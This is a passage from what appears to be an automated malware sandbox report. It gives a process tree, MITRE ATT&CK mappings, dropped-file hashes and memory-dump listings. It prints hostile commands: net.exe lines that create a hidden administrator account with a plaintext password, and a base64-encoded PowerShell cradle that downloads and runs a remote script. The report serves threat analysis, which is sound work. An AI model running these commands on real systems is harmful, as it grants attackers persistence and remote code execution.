- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Administrators" wgautilacc /ADD
    3⤵
    PID:3060

C:\Windows\System32\cmd.exe
cmd /C net.exe user wgautilacc kEE2SQbH
1⤵
- Suspicious use of WriteProcessMemory
PID:1812
- C:\Windows\system32\net.exe
  net.exe user wgautilacc kEE2SQbH
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3888
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user wgautilacc kEE2SQbH
    3⤵
    PID:1008

C:\Windows\System32\cmd.exe
cmd.exe /C wmic path win32_VideoController get name
1⤵
- Suspicious use of WriteProcessMemory
PID:808
- C:\Windows\System32\Wbem\WMIC.exe
  wmic path win32_VideoController get name
  2⤵
  PID:2888

C:\Windows\System32\cmd.exe
cmd.exe /C wmic CPU get NAME
1⤵
- Suspicious use of WriteProcessMemory
PID:3264
- C:\Windows\System32\Wbem\WMIC.exe
  wmic CPU get NAME
  2⤵
  PID:724

C:\Windows\System32\cmd.exe
cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
1⤵
PID:1676
- C:\Windows\system32\cmd.exe
  cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
  2⤵
  PID:1016
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
    3⤵
    - Blocklisted process makes network request
    - Drops file in Program Files directory
    - Drops file in Windows directory
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    PID:1824

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Account Manipulation

T1098

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Account Manipulation

T1098

Discovery

Lateral Movement

Remote Desktop Protocol

T1076

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\43vvo1jn\43vvo1jn.dll

MD5
9323652b1acc8144cd7f9b5c427de0be

SHA1
62f129c8fa94caef13f521f27ea59963bbf2de5d

SHA256
503f533de2fbf5b965dfa3a87d1902ec22b117bf889554612bfe9f09aa783d02

SHA512
7099b41a1ed1f1a52d3a0f157cacafccfe85be55247cd93b43aa5d50e63fb0208a08c53270e92a10e2b9fe7e3579a611f905be362d76e262939ba43935629681

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES7DF5.tmp

MD5
9768c473430cd54442caec6cecf6290b

SHA1
1b9d88a76e04e2cda6ef8ba9e9db7de9e1d09475

SHA256
88b9ab09d58f38cdf1de535fd6b6a652dbbb18fdd4c62ea1aced1a941395ffa7

SHA512
792f3c5a2dbcce288b8da0f0d4519efd18d38a1bccaaa901654b61f245812f546350b179dd5bc41d686dae0aea6d9dc581b4dbe01c60281516501b78f1f4209e

Download Submit
C:\Users\Admin\AppData\Local\Temp\ready.ps1

MD5
3447df88de7128bdc34942334b2fab98

SHA1
519be4e532fc53a7b8fe2ae21c9b7e35f923d3bb

SHA256
9520067abc34ce8a4b7931256e4ca15f889ef61750ca8042f60f826cb6cb2ac9

SHA512
2ccf6c187c3e17918daadd1fc7ca6e7dfaf6b958468a9867cca233e3506906164dfeb6104c8324e09d3058b090eab22417695b001ddb84f3d98562aec05eb78f

Download Submit
C:\Users\Admin\AppData\Local\Temp\resolve-domain.PS1

MD5
78fc438bc0a10f68012273374fc242de

SHA1
1c2f8f958b4cfb2d822a50f97c1b503d039108d4

SHA256
14249168e782173812af05b444b582847646a69623a3254b8a590ba00365b4e0

SHA512
97d287f9e1ac939505e3ff2b7d6854ae838dd4f0cc3699d157912dcbb116b709b30580baac4c4ce7a5384e28de841dd44f12006c4857bc6a72bc8758427f280e

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\43vvo1jn\43vvo1jn.0.cs

MD5
4864fc038c0b4d61f508d402317c6e9a

SHA1
72171db3eea76ecff3f7f173b0de0d277b0fede7

SHA256
0f5273b8fce9bfd95677be80b808119c048086f8e17b2e9f9964ae8971bd5a84

SHA512
9e59e8bee83e783f8054a3ba90910415edacfa63cc19e5ded9d4f21f7c3005ca48c63d85ce8523a5f7d176aa5f8abafc28f824c10dbfb254eed1ce6e5f55bf31

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\43vvo1jn\43vvo1jn.cmdline

MD5
63ac7ce4be7f3ac7dfe37acf755eb2b8

SHA1
0a845a897029f1e6d56c027482372a4d46818990

SHA256
9eef6644c357b0141f392ac23fb0917153d9c88f7b880c746ac85a3c8666491a

SHA512
bac15dcd1480198c2b6e60c407a2e9c3abf7aea53f2f7bb09b1f68eb3d95a3bc31ae6f0ea3dea064e0b780edf4487009435265c801eb21dfa72ffd6ce2610222

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\43vvo1jn\CSC732EA7F145834E02AFF745DCAD2D37AF.TMP

MD5
6f14ca6f733aac5874406f403434e890

SHA1
673ecad46cadddf41c98002a3016fba445b09532

SHA256
8d1b2c523e60667998c5c82b7633398186661c9adcfd63a944f28504cd0d90d5

SHA512
50bdc21eae7146516687b7456637c323eee383f72869d0a35edb2e95ce0a4ba9d9fc8a4ab20d853a1f91377039da8b9322d0a21d6a4ae5dc9a354e90e5eff8b2

Download Submit
\Windows\Branding\mediasrv.png

MD5
07044622ac01aea214d75af177a9976f

SHA1
8647e016414d4ef1da52abcf889210f15c58a640

SHA256
e83dc368abf546e72a528509e3d2fd8e83153f783832abcef014cddb9da002e9

SHA512
21b30facf460b9c93d32e1a54d6e5e2578f49c782eb3325268f83ad9beb14dd2c06b9b8337161099a69c1ad082583fdf94d20c7c4e2c91063e6bc0e6c9664324

Download Submit
\Windows\Branding\mediasvc.png

MD5
7c2b6a91963747383e5cdb168539962c

SHA1
cd987c6f69702bf0369b4c49c898052fae21d513

SHA256
fc3c17833725d727590ef00fdf3f8d70f52d4c13a9cf52a77b6e74e22d7dae61

SHA512
8a952e2e7ac644cb73bc35f1d099f8c9590027f5e5f89771131025ce878c000fec1aeaf708113889e1044094ebbc311ee46f945cca6946860705edac4eec8141

Download Submit
memory/636-114-0x0000018766CA0000-0x00000187670C0000-memory.dmp

Filesize
4.1MB

Download
memory/636-118-0x0000018766865000-0x0000018766866000-memory.dmp

Filesize
4KB

Download
memory/636-119-0x0000018766866000-0x0000018766867000-memory.dmp

Filesize
4KB

Download
memory/636-116-0x0000018766860000-0x0000018766862000-memory.dmp

Filesize
8KB

Download
memory/636-117-0x0000018766863000-0x0000018766865000-memory.dmp

Filesize
8KB

Download
memory/696-350-0x0000000000000000-mapping.dmp

Download
memory/724-375-0x0000000000000000-mapping.dmp

Download
memory/772-355-0x0000000000000000-mapping.dmp

Download
memory/1008-373-0x0000000000000000-mapping.dmp

Download
memory/1016-363-0x0000000000000000-mapping.dmp

Download
memory/1016-376-0x0000000000000000-mapping.dmp

Download
memory/1268-136-0x000001EFE40F3000-0x000001EFE40F5000-memory.dmp

Filesize
8KB

Download
memory/1268-153-0x000001EFE40F8000-0x000001EFE40F9000-memory.dmp

Filesize
4KB

Download
memory/1268-154-0x000001EFFEEA0000-0x000001EFFEEA1000-memory.dmp

Filesize
4KB

Download
memory/1268-155-0x000001EFFF230000-0x000001EFFF231000-memory.dmp

Filesize
4KB

Download
memory/1268-126-0x000001EFE44A0000-0x000001EFE44A1000-memory.dmp

Filesize
4KB

Download
memory/1268-142-0x000001EFE40F6000-0x000001EFE40F8000-memory.dmp

Filesize
8KB

Download
memory/1268-135-0x000001EFE40F0000-0x000001EFE40F2000-memory.dmp

Filesize
8KB

Download
memory/1268-131-0x000001EFFE860000-0x000001EFFE861000-memory.dmp

Filesize
4KB

Download
memory/1268-147-0x000001EFE44D0000-0x000001EFE44D1000-memory.dmp

Filesize
4KB

Download
memory/1268-120-0x0000000000000000-mapping.dmp

Download
memory/1324-359-0x0000000000000000-mapping.dmp

Download
memory/1672-360-0x0000000000000000-mapping.dmp

Download
memory/1824-395-0x0000028E694D6000-0x0000028E694D8000-memory.dmp

Filesize
8KB

Download
memory/1824-389-0x0000028E694D0000-0x0000028E694D2000-memory.dmp

Filesize
8KB

Download
memory/1824-446-0x0000028E694D8000-0x0000028E694D9000-memory.dmp

Filesize
4KB

Download
memory/1824-366-0x0000000000000000-mapping.dmp

Download
memory/1824-390-0x0000028E694D3000-0x0000028E694D5000-memory.dmp

Filesize
8KB

Download
memory/1824-377-0x0000000000000000-mapping.dmp

Download
memory/1860-459-0x0000000000000000-mapping.dmp

Download
memory/1908-364-0x0000000000000000-mapping.dmp

Download
memory/2272-353-0x0000000000000000-mapping.dmp

Download
memory/2376-139-0x0000000000000000-mapping.dmp

Download
memory/2540-369-0x0000000000000000-mapping.dmp

Download
memory/2608-143-0x0000000000000000-mapping.dmp

Download
memory/2716-310-0x0000000000000000-mapping.dmp

Download
memory/2732-311-0x0000000000000000-mapping.dmp

Download
memory/2736-312-0x0000000000000000-mapping.dmp

Download
memory/2888-374-0x0000000000000000-mapping.dmp

Download
memory/3060-371-0x0000000000000000-mapping.dmp

Download
memory/3148-357-0x0000000000000000-mapping.dmp

Download
memory/3584-367-0x0000000000000000-mapping.dmp

Download
memory/3588-370-0x0000000000000000-mapping.dmp

Download
memory/3596-368-0x0000000000000000-mapping.dmp

Download
memory/3704-365-0x0000000000000000-mapping.dmp

Download
memory/3728-460-0x0000000000000000-mapping.dmp

Download
memory/3880-356-0x0000000000000000-mapping.dmp

Download
memory/3888-372-0x0000000000000000-mapping.dmp

Download
memory/3896-252-0x00000170D2248000-0x00000170D224A000-memory.dmp

Filesize
8KB

Download
memory/3896-208-0x0000000000000000-mapping.dmp

Download
memory/3896-219-0x00000170D2243000-0x00000170D2245000-memory.dmp

Filesize
8KB

Download
memory/3896-218-0x00000170D2240000-0x00000170D2242000-memory.dmp

Filesize
8KB

Download
memory/3896-251-0x00000170D2246000-0x00000170D2248000-memory.dmp

Filesize
8KB

Download
memory/3980-349-0x0000000000000000-mapping.dmp

Download
memory/3996-358-0x0000000000000000-mapping.dmp

Download
memory/3996-290-0x0000024D40243000-0x0000024D40245000-memory.dmp

Filesize
8KB

Download
memory/3996-249-0x0000000000000000-mapping.dmp

Download
memory/3996-300-0x0000024D40248000-0x0000024D4024A000-memory.dmp

Filesize
8KB

Download
memory/3996-289-0x0000024D40240000-0x0000024D40242000-memory.dmp

Filesize
8KB

Download
memory/3996-291-0x0000024D40246000-0x0000024D40248000-memory.dmp

Filesize
8KB

Download
memory/4020-217-0x0000019DDFBE8000-0x0000019DDFBEA000-memory.dmp

Filesize
8KB

Download
memory/4020-178-0x0000019DDFBE6000-0x0000019DDFBE8000-memory.dmp

Filesize
8KB

Download
memory/4020-174-0x0000019DDFBE0000-0x0000019DDFBE2000-memory.dmp

Filesize
8KB

Download
memory/4020-175-0x0000019DDFBE3000-0x0000019DDFBE5000-memory.dmp

Filesize
8KB

Download
memory/4020-162-0x0000000000000000-mapping.dmp

Download
memory/4092-354-0x0000000000000000-mapping.dmp

Download